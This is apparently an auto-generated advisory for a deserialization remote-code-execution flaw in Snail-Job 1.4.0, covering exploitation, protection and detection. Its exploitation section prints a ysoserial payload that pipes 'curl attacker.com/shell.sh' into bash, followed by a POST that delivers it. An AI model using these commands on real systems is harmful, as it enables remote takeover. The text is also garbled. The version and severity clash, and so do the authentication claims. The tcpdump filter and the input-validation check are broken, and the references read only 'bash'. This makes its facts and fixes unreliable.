Snail-Job 140, Remote Code Execution via Deserialization, CVE-2025-2622 (Critical)

How CVE-2025-2622 Works

The vulnerability exists in the `getRuntime` function within Snail-Job 1.4.0’s Workflow-Task Management Module. Attackers can exploit insecure deserialization in the `nodeExpression` parameter, allowing remote code execution (RCE) due to improper input validation. By crafting a malicious serialized object and sending it via the `/snail-job/workflow/check-node-expression` endpoint, an attacker gains arbitrary code execution under the application’s context. The exploit leverages default Java deserialization gadgets, enabling command injection without authentication.

DailyCVE Form

Platform: Snail-Job
Version: 1.4.0
Vulnerability: RCE via Deserialization
Severity: Critical
Date: 03/26/2025

What Undercode Say:

Exploitation

1. Payload Crafting:

ysoserial -g CommonsCollections5 'curl attacker.com/shell.sh | bash' > payload.bin

2. Exploit Trigger:

curl -X POST http://target/snail-job/workflow/check-node-expression --data @payload.bin

Protection

1. Patch: Upgrade to Snail-Job 1.4.1+.

2. Mitigation:

location /snail-job/workflow/ { deny all; }

3. Input Validation:

if (nodeExpression.contains("java.io.Serializable")) { throw new SecurityException(); }

Detection

1. Log Analysis:

grep -r "Runtime.getRuntime()" /var/log/snail-job

2. Network Monitoring:

tcpdump -i eth0 'port 80 and tcp[bash] = 0x504f' -w deserialization.pcap

References

• bash
• bash

Analytics:

• CVSS 4.0: 5.3 (Medium)
• Attack Vector: Network
• Privileges Required: Low
• Exploit Availability: Public

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-2622
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram